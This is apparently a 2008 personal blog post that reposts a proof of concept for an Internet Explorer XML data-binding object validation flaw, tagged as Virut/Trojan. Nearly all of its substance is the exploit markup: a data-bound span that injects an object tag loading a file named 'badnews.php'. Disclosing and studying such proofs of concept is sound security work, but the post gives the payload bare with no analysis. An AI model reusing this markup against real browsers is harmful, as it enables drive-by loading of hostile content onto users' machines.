Portfolio
My Blog
Scroll down to discover
Search
Categories

[malware]Microsoft Internet Explorer XML Page Object Type Validation Vulnerability

June 21, 2008Category : Virut/Trojan

The following proof of concept has been supplied:

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security>
<exploit>
<![CDATA[
<object id=”oFile” data=”badnews.php”></object>
]]>
</exploit>
</security>
</xml>

Leave a Reply

Your email address will not be published. Required fields are marked *

01.
© Oliver / All rights reserved.
To top